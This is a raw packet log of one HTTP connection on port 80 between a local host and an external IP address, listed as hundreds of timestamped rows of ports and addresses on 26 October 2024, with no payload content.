Oct 26, 2024 07:27:20.706912041 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.706928968 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.706940889 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.706943035 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.706954956 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.706963062 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.706969023 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.706983089 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.707010031 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.712501049 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.712552071 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.712553978 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.712563992 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.712590933 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.712596893 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.712605000 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.712615967 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.712635994 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.712646961 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.751988888 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.752005100 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.752019882 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.752038002 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.752047062 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.752049923 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.752062082 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.752070904 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.752110004 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.752120972 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.752130032 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.752141953 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.752147913 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.752171993 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.752183914 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.752273083 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.752285004 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.752296925 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.752310038 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.752325058 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.752347946 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.752475023 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.752486944 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.752517939 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.752532959 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.752552032 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.752563953 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.752574921 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.752592087 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.752593040 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.752604961 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.752613068 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.752640963 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.752841949 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.752855062 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.752872944 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.752882004 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.752885103 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.752898932 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.752912998 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.752938986 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.753096104 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.753132105 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.753134012 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.753144979 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.753173113 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.753190994 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.753191948 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.753201962 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.753213882 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.753226042 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.753233910 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.753246069 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.753248930 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.753257990 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.753269911 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.753279924 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.753283024 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.753292084 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.753313065 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.753330946 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.753736973 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.753750086 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.753761053 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.753772974 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.753799915 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.753799915 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.753813028 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.753825903 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.753856897 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.753968000 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.753987074 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.753998995 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.754007101 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.754019976 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.754030943 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.754038095 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.754060984 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.754060984 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.754074097 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.754084110 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.754092932 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.754095078 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.754125118 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.754148960 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.796653032 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.796681881 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.796694040 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.796709061 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.796715021 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.796729088 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.796737909 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.796741009 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.796781063 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.823724985 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.823785067 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.823817015 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.823828936 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.823839903 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.823853016 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.823864937 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.823868990 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.823887110 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.823889017 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.823903084 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.823915005 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.823924065 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.823928118 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.823940992 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.823940992 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.823951960 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.823966980 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.823997021 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.824178934 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.824222088 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.824239969 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.824253082 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.824285030 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.824294090 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.824301004 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.824311972 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.824322939 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.824336052 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.824340105 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.824362040 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.824373007 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.824383974 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.824415922 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.824625969 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.824636936 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.824649096 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.824661016 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.824670076 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.824693918 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.824697018 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.824707031 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.824717999 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.824721098 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.824747086 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.824771881 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.824893951 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.824904919 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.824949026 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.825213909 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.825226068 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.825258970 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.830212116 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.830225945 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.830238104 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.830250978 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.830264091 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.830272913 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.830317974 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.869795084 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.869837046 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.869894028 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.869905949 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.869919062 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.869931936 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.869956970 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.869975090 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.869986057 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.869991064 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.870001078 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.870014906 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.870026112 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.870035887 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.870048046 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.870074987 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.870305061 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.870330095 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.870342970 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.870353937 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.870379925 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.870440960 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.870462894 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.870487928 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.870512009 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.870569944 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.870583057 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.870594025 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.870609045 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.870614052 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.870620966 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.870644093 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.870666981 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.870834112 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.870846033 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.870856047 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.870874882 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.870879889 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.870888948 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.870901108 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.870903969 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.870933056 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.870945930 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.871191978 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.871208906 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.871223927 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.871237993 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.871241093 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.871252060 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.871262074 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.871264935 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.871278048 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.871288061 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.871290922 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.871304035 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.871308088 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.871339083 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.871341944 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.871352911 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.871365070 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.871371031 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.871397018 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.871421099 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.871916056 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.871958971 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.871975899 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.871989012 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.872015953 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.872039080 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.872051001 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.872076035 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.872101068 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.914536953 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.914556026 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.914567947 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.914578915 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.914597034 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.914740086 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.941334009 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.941360950 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.941381931 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.941392899 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.941411018 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.941422939 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.941433907 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.941442013 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.941447020 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.941459894 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.941468000 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.941490889 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.941508055 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.941612959 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.941632032 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.941643953 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.941654921 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.941668987 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.941679955 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.941705942 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.941718102 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.941783905 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.941822052 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.941828012 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.941834927 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.941860914 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.941873074 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.941926956 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.941940069 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.941951990 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.941968918 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.941983938 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.941993952 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.941998005 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.942022085 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.942033052 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.942222118 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.942240953 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.942251921 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.942265987 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.942275047 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.942298889 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.942410946 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.942423105 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.942435980 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.942451954 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.942452908 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.942476988 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.942502022 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.947662115 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.947735071 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.947736025 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.947770119 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.947858095 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.947870016 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.947880983 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.947895050 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.947905064 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.947907925 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.947940111 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.947952986 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.987286091 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.987307072 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.987327099 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.987339973 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.987349987 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.987356901 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.987361908 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.987375975 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.987384081 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.987389088 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.987416029 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.987427950 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.987539053 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.987550020 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.987567902 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.987581015 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.987586975 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.987595081 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.987607956 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.987615108 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.987627029 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.987627983 CEST	80	49982	185.215.113.84	192.168.2.7
